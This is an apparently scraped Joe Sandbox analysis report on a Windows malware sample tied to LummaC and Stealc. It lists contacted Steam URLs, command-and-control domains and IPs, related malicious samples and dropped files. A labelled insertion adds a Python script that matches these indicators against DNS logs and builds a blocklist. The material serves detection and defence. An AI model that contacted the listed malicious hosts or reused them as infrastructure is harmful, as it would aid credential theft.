                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://help.steampowered.com/en/86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://steamcommunity.com/market/86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://store.steampowered.com/news/86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://store.steampowered.com/subscriber_agreement/86DC.tmp.exe, 00000003.00000003.1640001694.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org86DC.tmp.exe, 00000003.00000003.1640001694.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://recaptcha.net/recaptcha/;86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://steamcommunity.com/discussions/86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://store.steampowered.com/stats/86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://medal.tv86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://broadcast.st.dl.eccdnx.com86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://store.steampowered.com/steam_refunds/86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a86DC.tmp.exe, 00000003.00000003.1640001694.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://steamcommunity.com/login/home/?goto=profiles%2F7656119972433190086DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=96201686DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://steamcommunity.com/workshop/86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://login.steampowered.com/86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb86DC.tmp.exe, 00000003.00000003.1640001694.0000000000944000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://store.steampowered.com/legal/86DC.tmp.exe, 00000003.00000003.1640001694.0000000000922000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1639938848.00000000009AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760675566.0000000003030000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl86DC.tmp.exe, 00000003.00000003.1639938848.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://post-to-me.com/DsAZCFTWko2q.exe, 00000000.00000002.3895670011.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://recaptcha.net86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  http://upx.sf.netAmcache.hve.7.drfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://store.steampowered.com/86DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://steamcommunity.com/profiles/76561199724331900_86DC.tmp.exe, 00000003.00000003.1640135258.0000000000959000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760231719.000000000095C000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000958000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640253542.000000000095A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png86DC.tmp.exe, 00000003.00000003.1640193607.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          http://127.0.0.1:2706086DC.tmp.exe, 00000003.00000002.1760137243.0000000000944000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                                            • 75% < No. of IPs
                                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
104.21.16.1 | deafeninggeh.biz | United States | 13335 CLOUDFLARENET US | false
104.21.56.70 | post-to-me.com | United States | 13335 CLOUDFLARENET US | false
23.55.153.106 | steamcommunity.com | United States | 20940 AKAMAI-ASN1 EU | false
176.113.115.19 | unknown | Russian Federation | 49505 SELECTEL RU | false
172.67.207.38 | immureprech.biz | United States | 13335 CLOUDFLARENET US | false
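An added example, not part of the Joe Sandbox report or of its tooling: a Python script that takes the contacted-host indicators from the table above and runs them over DNS-query log lines. The indicator values and ASNs are copied from the table; the log format, the hostnames and addresses in the sample lines, and the `Hit`, `scan` and `blocklist` names are assumptions constructed for the demonstration. It also encodes the caveat the "Domains" match table further down makes visible: the Cloudflare-fronted C2 domains resolve to different 104.21.x.x / 172.67.x.x addresses in other analyses, so an address hit inside a shared CDN range is reported as low confidence, while a hit on the domain itself (or a subdomain of it) is high.

```python
import re
from dataclasses import dataclass

# Indicators copied from the report's contacted IPs/domains table:
# (IP, domain the IP was resolved from or None, ASN).
INDICATORS = [
    ("104.21.16.1",    "deafeninggeh.biz",   13335),
    ("104.21.56.70",   "post-to-me.com",     13335),
    ("23.55.153.106",  "steamcommunity.com", 20940),
    ("176.113.115.19", None,                 49505),
    ("172.67.207.38",  "immureprech.biz",    13335),
]

# ASNs of shared CDN infrastructure (from the table): an address in these
# ranges is used by many unrelated tenants, so an IP hit alone is weak evidence.
SHARED_ASNS = {13335: "CLOUDFLARENET", 20940: "AKAMAI-ASN1"}

# Legitimate service contacted alongside the C2 hosts; report it, never block it.
BENIGN_SHARED = {"steamcommunity.com"}


@dataclass
class Hit:
    line_no: int
    indicator: str
    kind: str        # "domain" or "ip"
    confidence: str  # "high", "low" or "info"


# Constructed log format (an assumption, not any real product's format):
#   <timestamp> <client> QUERY <queried name> -> <answer IP>
LOG_RE = re.compile(r"^(\S+)\s+(\S+)\s+QUERY\s+(\S+)\s+->\s+(\S+)$")


def _domain_matches(name: str, indicator: str) -> bool:
    """True for the indicator itself and for any subdomain of it."""
    name = name.rstrip(".").lower()
    return name == indicator or name.endswith("." + indicator)


def scan(lines):
    """Return one Hit per matching log line; a domain match takes priority over an IP match."""
    domain_iocs = [d for _, d, _ in INDICATORS if d]
    ip_iocs = {ip: asn for ip, _, asn in INDICATORS}
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # unparsable line: skip it instead of silently matching nothing
        _, _, name, answer = m.groups()
        dom = next((d for d in domain_iocs if _domain_matches(name, d)), None)
        if dom is not None:
            hits.append(Hit(n, dom, "domain", "info" if dom in BENIGN_SHARED else "high"))
        elif answer in ip_iocs:
            conf = "low" if ip_iocs[answer] in SHARED_ASNS else "high"
            hits.append(Hit(n, answer, "ip", conf))
    return hits


def blocklist():
    """Indicators safe to push to a DNS/IP block: the C2 domains and the non-CDN address."""
    out = {d for _, d, _ in INDICATORS if d and d not in BENIGN_SHARED}
    out |= {ip for ip, _, asn in INDICATORS if asn not in SHARED_ASNS}
    return out


# Constructed sample log (not from the report's PCAP); TEST-NET addresses and
# .example names stand in for unrelated traffic.
SAMPLE_LOG = [
    "2024-12-15T08:20:31Z WS01 QUERY deafeninggeh.biz -> 104.21.16.1",
    "2024-12-15T08:20:32Z WS01 QUERY www.example.org -> 198.51.100.7",
    "2024-12-15T08:20:33Z WS01 QUERY steamcommunity.com -> 23.55.153.106",
    "2024-12-15T08:20:34Z WS02 QUERY static.vendor-cdn.example -> 104.21.56.70",
    "2024-12-15T08:20:35Z WS02 QUERY update-host.example -> 176.113.115.19",
    "2024-12-15T08:20:36Z WS02 QUERY api.immureprech.biz -> 172.67.207.38",
    "garbage line the parser must not choke on",
]

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(f"line {h.line_no}: {h.kind} {h.indicator} ({h.confidence})")
    print("blocklist:", sorted(blocklist()))
```

Line 4 of the sample log is the case that matters in practice: a query for an unrelated name that happens to resolve to 104.21.56.70 is a Cloudflare tenant collision, not a LummaC beacon, so it is surfaced for triage rather than blocked. The 176.113.115.19 hit, by contrast, sits in a non-CDN ASN with no domain in the table and is treated as a usable address indicator.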
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1575332
Start date and time: 2024-12-15 09:19:19 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 44s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: AZCFTWko2q.exe (renamed because the original name is a hash value)
Original Sample Name: 7c13e0cbd1513abe7f2d2d73cc0ad615.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@4/7@11/5
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 93%
• Number of executed functions: 41
• Number of non-executed functions: 336
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for currently running targets with high CPU consumption
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 52.168.117.173, 4.175.87.197, 20.190.147.5
• Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big: too many NtOpenKeyEx calls found
• Report size getting too big: too many NtProtectVirtualMemory calls found
• Report size getting too big: too many NtQueryValueKey calls found
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:20:23 | API Interceptor | 9110307x Sleep call for process: AZCFTWko2q.exe modified
03:20:29 | API Interceptor | 8x Sleep call for process: 86DC.tmp.exe modified
03:20:49 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
104.21.16.1 | JNKHlxGvw4.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse
• 188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php
104.21.56.70 | rHrG691f7q.exe | Get hash | malicious | LummaC | Browse
104.21.56.70 | XIaCqh1vRm.exe | Get hash | malicious | LummaC | Browse
104.21.56.70 | QQx0tdFC0b.exe | Get hash | malicious | LummaC | Browse
104.21.56.70 | LXS5itpTK7.exe | Get hash | malicious | Stealc | Browse
104.21.56.70 | ief722WreR.exe | Get hash | malicious | Stealc | Browse
104.21.56.70 | 7gxaFDUSOD.exe | Get hash | malicious | Stealc | Browse
104.21.56.70 | YQ3PhY2Aeq.exe | Get hash | malicious | Stealc, Vidar | Browse
104.21.56.70 | vwkb5DQRAL.exe | Get hash | malicious | Stealc, Vidar | Browse
104.21.56.70 | Tg3sk2wywR.exe | Get hash | malicious | Stealc | Browse
104.21.56.70 | x8AH98H0eQ.exe | Get hash | malicious | Stealc | Browse
23.55.153.106 | YbJEkgZ4z5.exe | Get hash | malicious | LummaC | Browse
23.55.153.106 | 3cb2b5U8BR.exe | Get hash | malicious | LummaC | Browse
23.55.153.106 | afXf6ZiYTT.exe | Get hash | malicious | LummaC | Browse
23.55.153.106 | ZideZBMwUQ.exe | Get hash | malicious | LummaC | Browse
23.55.153.106 | hKyD3sj3Y9.exe | Get hash | malicious | LummaC | Browse
23.55.153.106 | P0w3gV5bH3.exe | Get hash | malicious | LummaC | Browse
23.55.153.106 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | Browse
23.55.153.106 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse
23.55.153.106 | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar, Xmrig | Browse
23.55.153.106 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | Browse
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
immureprech.biz | YbJEkgZ4z5.exe | Get hash | malicious | LummaC | Browse
• 172.67.207.38
immureprech.biz | 3cb2b5U8BR.exe | Get hash | malicious | LummaC | Browse
• 172.67.207.38
immureprech.biz | afXf6ZiYTT.exe | Get hash | malicious | LummaC | Browse
• 172.67.207.38
immureprech.biz | ZideZBMwUQ.exe | Get hash | malicious | LummaC | Browse
• 172.67.207.38
immureprech.biz | hKyD3sj3Y9.exe | Get hash | malicious | LummaC | Browse
• 172.67.207.38
immureprech.biz | P0w3gV5bH3.exe | Get hash | malicious | LummaC | Browse
• 104.21.22.222
immureprech.biz | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | Browse
• 104.21.22.222
immureprech.biz | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse
• 172.67.207.38
immureprech.biz | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar, Xmrig | Browse
• 104.21.22.222
immureprech.biz | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig | Browse
• 104.21.22.222
deafeninggeh.biz | YbJEkgZ4z5.exe | Get hash | malicious | LummaC | Browse
• 104.21.16.1
deafeninggeh.biz | 3cb2b5U8BR.exe | Get hash | malicious | LummaC | Browse
• 104.21.32.1
deafeninggeh.biz | afXf6ZiYTT.exe | Get hash | malicious | LummaC | Browse
• 104.21.48.1
deafeninggeh.biz | ZideZBMwUQ.exe | Get hash | malicious | LummaC | Browse
• 104.21.48.1
deafeninggeh.biz | hKyD3sj3Y9.exe | Get hash | malicious | LummaC | Browse
• 104.21.48.1
deafeninggeh.biz | P0w3gV5bH3.exe | Get hash | malicious | LummaC | Browse
• 104.21.64.1
deafeninggeh.biz | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | Browse
• 104.21.80.1
deafeninggeh.biz | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse
• 104.21.112.1
deafeninggeh.biz | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar, Xmrig | Browse
• 104.21.96.1
deafeninggeh.biz | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig | Browse
• 104.21.32.1
post-to-me.com | rHrG691f7q.exe | Get hash | malicious | LummaC | Browse
• 104.21.56.70
post-to-me.com | TN78WX7nJU.exe | Get hash | malicious | LummaC | Browse
• 172.67.179.207
                                                                                                                                                                                                                                                                    XIaCqh1vRm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    QQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    LXS5itpTK7.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    SEejSLAS9f.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                                    • 172.67.179.207
                                                                                                                                                                                                                                                                    EbXj93v3bO.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                                    • 172.67.179.207
                                                                                                                                                                                                                                                                    ssB9bjDQPf.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                                    • 172.67.179.207
                                                                                                                                                                                                                                                                    ief722WreR.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    7gxaFDUSOD.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                                                                                                                    steamcommunity.comYbJEkgZ4z5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    3cb2b5U8BR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    afXf6ZiYTT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    ZideZBMwUQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    hKyD3sj3Y9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    P0w3gV5bH3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                    • 92.122.104.90
Match / Associated Sample Name / URL | Detection | Threat Name (Context IPs listed below each row)
Match: AKAMAI-ASN1EU
YbJEkgZ4z5.exe | malicious | LummaC
• 23.55.153.106
3cb2b5U8BR.exe | malicious | LummaC
• 23.55.153.106
afXf6ZiYTT.exe | malicious | LummaC
• 23.55.153.106
ZideZBMwUQ.exe | malicious | LummaC
• 23.55.153.106
hKyD3sj3Y9.exe | malicious | LummaC
• 23.55.153.106
P0w3gV5bH3.exe | malicious | LummaC
• 23.55.153.106
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar
• 23.55.153.106
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc
• 23.55.153.106
file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar, Xmrig
• 23.55.153.106
rebirth.spc.elf | malicious | Mirai, Okiru
• 23.215.60.12
Match: CLOUDFLARENETUS
YbJEkgZ4z5.exe | malicious | LummaC
• 172.67.207.38
3cb2b5U8BR.exe | malicious | LummaC
• 172.67.207.38
afXf6ZiYTT.exe | malicious | LummaC
• 172.67.207.38
ZideZBMwUQ.exe | malicious | LummaC
• 172.67.207.38
hKyD3sj3Y9.exe | malicious | LummaC
• 172.67.207.38
P0w3gV5bH3.exe | malicious | LummaC
• 104.21.64.1
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar
• 172.67.164.37
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc
• 172.67.207.38
wmdqEYgW2i.exe | malicious | DCRat, PureLog Stealer, zgRAT
• 104.20.22.46
file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar, Xmrig
• 104.21.79.7
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
a0e9f5d64349fb13191bc781f81f42e1
  YbJEkgZ4z5.exe | Get hash | malicious | LummaC | Browse
    • 23.55.153.106
    • 104.21.16.1
    • 172.67.207.38
  3cb2b5U8BR.exe | Get hash | malicious | LummaC | Browse
    • 23.55.153.106
    • 104.21.16.1
    • 172.67.207.38
  afXf6ZiYTT.exe | Get hash | malicious | LummaC | Browse
    • 23.55.153.106
    • 104.21.16.1
    • 172.67.207.38
  ZideZBMwUQ.exe | Get hash | malicious | LummaC | Browse
    • 23.55.153.106
    • 104.21.16.1
    • 172.67.207.38
  hKyD3sj3Y9.exe | Get hash | malicious | LummaC | Browse
    • 23.55.153.106
    • 104.21.16.1
    • 172.67.207.38
  P0w3gV5bH3.exe | Get hash | malicious | LummaC | Browse
    • 23.55.153.106
    • 104.21.16.1
    • 172.67.207.38
  file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | Browse
    • 23.55.153.106
    • 104.21.16.1
    • 172.67.207.38
  file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse
    • 23.55.153.106
    • 104.21.16.1
    • 172.67.207.38
  file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar, Xmrig | Browse
    • 23.55.153.106
    • 104.21.16.1
    • 172.67.207.38
  file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig | Browse
    • 23.55.153.106
    • 104.21.16.1
    • 172.67.207.38
37f463bf4616ecd445d4a1937da06e19
  file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar, Xmrig | Browse
    • 104.21.56.70
  file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar | Browse
    • 104.21.56.70
  file.exe | Get hash | malicious | ScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, Xmrig | Browse
    • 104.21.56.70
  file.exe | Get hash | malicious | Amadey, LummaC Stealer, Stealc, Vidar, Xmrig | Browse
    • 104.21.56.70
  build.msi | Get hash | malicious | Unknown | Browse
    • 104.21.56.70
  rHrG691f7q.exe | Get hash | malicious | LummaC | Browse
    • 104.21.56.70
  Setup.msi | Get hash | malicious | Unknown | Browse
    • 104.21.56.70
  setup.msi | Get hash | malicious | Unknown | Browse
    • 104.21.56.70
  TN78WX7nJU.exe | Get hash | malicious | LummaC | Browse
    • 104.21.56.70
  XIaCqh1vRm.exe | Get hash | malicious | LummaC | Browse
    • 104.21.56.70
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\AppData\Local\Temp\86DC.tmp.exe
  rHrG691f7q.exe | Get hash | malicious | LummaC | Browse
  TN78WX7nJU.exe | Get hash | malicious | LummaC | Browse
  XIaCqh1vRm.exe | Get hash | malicious | LummaC | Browse
  QQx0tdFC0b.exe | Get hash | malicious | LummaC | Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe
  rHrG691f7q.exe | Get hash | malicious | LummaC | Browse
  TN78WX7nJU.exe | Get hash | malicious | LummaC | Browse
  XIaCqh1vRm.exe | Get hash | malicious | LummaC | Browse
  QQx0tdFC0b.exe | Get hash | malicious | LummaC | Browse
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):65536
Entropy (8bit):0.9576674386021528
Encrypted:false
SSDEEP:96:/CAFqFxsjh4BB74sfYQXIDcQLc6NcEwcw3eGY+HbHg/8BRTf3Oy1E45WAU6NCUtI:vQFxJ0M0lJaNju3RzuiFRZ24IO8s
MD5:6305922D5332F3C56D99F38ED122915C
